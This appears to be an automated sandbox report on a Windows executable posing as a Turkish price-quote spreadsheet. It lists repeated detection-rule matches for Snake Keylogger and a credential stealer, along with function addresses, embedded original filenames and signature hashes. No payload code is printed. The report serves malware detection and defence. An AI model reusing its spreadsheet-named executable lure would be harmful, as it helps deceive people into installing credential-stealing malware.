Source: 3.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000003.00000002.4107406678.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000003.00000002.4107406678.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.1716836366.000000000387A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1716836366.000000000387A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe PID: 280, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe PID: 280, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe PID: 6308, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe PID: 6308, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 0_2_0103D55C	0_2_0103D55C
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 0_2_07239350	0_2_07239350
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 0_2_07235530	0_2_07235530
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 0_2_072335A2	0_2_072335A2
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 0_2_072335B0	0_2_072335B0
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 0_2_07239341	0_2_07239341
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 0_2_07233168	0_2_07233168
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 0_2_072350E8	0_2_072350E8
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 0_2_072350F8	0_2_072350F8
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 0_2_07232D32	0_2_07232D32
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_01186108	3_2_01186108
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_0118C190	3_2_0118C190
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_0118F01F	3_2_0118F01F
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_0118B328	3_2_0118B328
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_0118C470	3_2_0118C470
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_01186730	3_2_01186730
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_0118C752	3_2_0118C752
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_01189858	3_2_01189858
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_0118BBD2	3_2_0118BBD2
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_0118CA32	3_2_0118CA32
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_01184AD9	3_2_01184AD9
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_0118BEB0	3_2_0118BEB0
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_0118E52F	3_2_0118E52F
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_0118E540	3_2_0118E540
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_01183572	3_2_01183572
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_0118B4F2	3_2_0118B4F2
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_0576C448	3_2_0576C448
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_0576A4C0	3_2_0576A4C0
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_0576B7B0	3_2_0576B7B0
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_05769E78	3_2_05769E78
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_0576BE00	3_2_0576BE00
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_05767EEB	3_2_05767EEB
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_0576B160	3_2_0576B160
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_05767910	3_2_05767910
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_057691E0	3_2_057691E0
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_05769830	3_2_05769830
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_0576AB10	3_2_0576AB10
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_05760D48	3_2_05760D48
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_05760D39	3_2_05760D39
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_0576BDF1	3_2_0576BDF1
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_0576BDFB	3_2_0576BDFB
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_05765DA0	3_2_05765DA0
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_05765D92	3_2_05765D92
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_05764C40	3_2_05764C40
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_05764C30	3_2_05764C30
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_0576C438	3_2_0576C438
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_05766C08	3_2_05766C08
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_057654F0	3_2_057654F0
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_057654E2	3_2_057654E2
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_0576A4B3	3_2_0576A4B3
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_057674B8	3_2_057674B8
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_057674A8	3_2_057674A8
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_05760498	3_2_05760498
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_05760488	3_2_05760488
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_05767F58	3_2_05767F58
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_057647E8	3_2_057647E8
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_057647DA	3_2_057647DA
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_057667B0	3_2_057667B0
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_057647B0	3_2_057647B0
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_057667A0	3_2_057667A0
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_0576B7A0	3_2_0576B7A0
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_05769E67	3_2_05769E67
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_05763600	3_2_05763600
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_0576B150	3_2_0576B150
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_05765948	3_2_05765948
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_05765938	3_2_05765938
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_05762900	3_2_05762900
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_05767900	3_2_05767900
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_057691CF	3_2_057691CF
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_057611A0	3_2_057611A0
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_05761191	3_2_05761191
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_05767060	3_2_05767060
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_05767054	3_2_05767054
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_05760040	3_2_05760040
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_05769820	3_2_05769820
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_05760007	3_2_05760007
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_057608F0	3_2_057608F0
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_057608E0	3_2_057608E0
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_05765098	3_2_05765098
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_0576508A	3_2_0576508A
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_05764368	3_2_05764368
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_05764358	3_2_05764358
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_0576AB03	3_2_0576AB03
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_05766BF8	3_2_05766BF8
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_05766220	3_2_05766220
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 3_2_05766210	3_2_05766210

Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1715367720.0000000002869000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1719295386.0000000007180000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1713336778.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718833989.0000000006F4F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1716836366.000000000387A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1716836366.000000000387A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4107691383.0000000000CF7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4107406678.0000000000422000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Binary or memory string: OriginalFilenameaGZb.exe8 vs ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 3.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
